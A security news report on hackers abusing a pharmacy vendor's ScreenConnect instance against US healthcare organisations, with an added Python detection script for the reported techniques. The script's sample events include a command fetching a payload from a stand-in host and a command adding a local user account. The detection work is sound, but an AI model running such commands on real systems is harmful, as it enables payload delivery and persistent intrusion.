Security researchers have issued a warning about hackers targeting multiple healthcare organizations in the U.S. by exploiting the ScreenConnect remote access tool. They have identified the use of local ScreenConnect instances by Transaction Data Systems (TDS), a pharmacy supply chain and management systems solution provider operating in all 50 states.
The attacks were spotted by researchers at managed security platform Huntress, who observed them on endpoints from two different healthcare organizations. They also detected activity indicating network reconnaissance in preparation for further attacks.
The intrusions were observed between October 28 and November 8, 2023, and are believed to still be ongoing.
Huntress reports that the attacks share similar tactics, techniques, and procedures (TTPs). These include the downloading of a payload named text.xml, indicating that the same actor is responsible for all observed incidents.
The XML file contains C# code that loads the Metasploit payload Meterpreter into memory without using PowerShell, in order to avoid detection. Huntress also observed additional processes being launched via the Print Spooler service.
The compromised endpoints run on a Windows Server 2019 system and are associated with two distinct organizations – one in the pharmaceutical sector and the other in healthcare. The common link between them is a ScreenConnect instance.
The remote access tool was used to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers also tried to create new user accounts for persistent access.
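As an added example (not code from the article or from Huntress), the TTPs described above turned into a simple triage check over process-creation events in Python; the Sysmon-style event fields, the ScreenConnect client binary names, and the sample events are assumptions.

```python
"""Flag process-creation events matching the ScreenConnect intrusion TTPs.

Added example, not from the article or Huntress. Assumed: events are
Sysmon-style process-creation records already parsed into dicts; the
ScreenConnect client binary names below are assumptions as well.
"""
import re

SCREENCONNECT_IMAGES = {"screenconnect.clientservice.exe",  # assumed client names
                        "screenconnect.windowsclient.exe"}
SPOOLER_IMAGE = "spoolsv.exe"  # Windows Print Spooler service process
NET_USER_ADD = re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) tuples for every event matching one of the TTPs."""
    hits = []
    for ev in events:
        parent = _basename(ev.get("parent_image", ""))
        image = _basename(ev.get("image", ""))
        cmd = ev.get("command_line", "")
        pid = ev["pid"]
        if parent in SCREENCONNECT_IMAGES:      # remote tool used to run commands
            hits.append(("screenconnect_spawned_process", pid))
        if parent == SPOOLER_IMAGE:             # processes launched via Print Spooler
            hits.append(("spooler_spawned_process", pid))
        if NET_USER_ADD.search(cmd):            # new local account for persistence
            hits.append(("local_account_created", pid))
        if image == "anydesk.exe" or "anydesk" in cmd.lower():  # secondary RAT
            hits.append(("anydesk_activity", pid))
        if "text.xml" in cmd.lower():           # payload name reported by Huntress
            hits.append(("text_xml_payload_reference", pid))
    return hits


SAMPLE_EVENTS = [  # constructed sample data; placeholder.invalid is not a real host
    {"pid": 1, "parent_image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl -o C:\Users\Public\text.xml http://placeholder.invalid/text.xml"},
    {"pid": 2, "parent_image": r"C:\Windows\System32\spoolsv.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"pid": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "command_line": "net user svc_backup P@ss /add"},
    {"pid": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```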
Researchers identified the ScreenConnect instance as being tied to the ‘rs.tdsclinical[.]com’ domain associated with TDS. It remains unclear if TDS suffered a breach, if credentials to one of their accounts were compromised, or if the attackers exploited a different mechanism.
Huntress made multiple attempts to notify TDS, now known as ‘Outcomes’ following a merger last summer, but the company did not respond.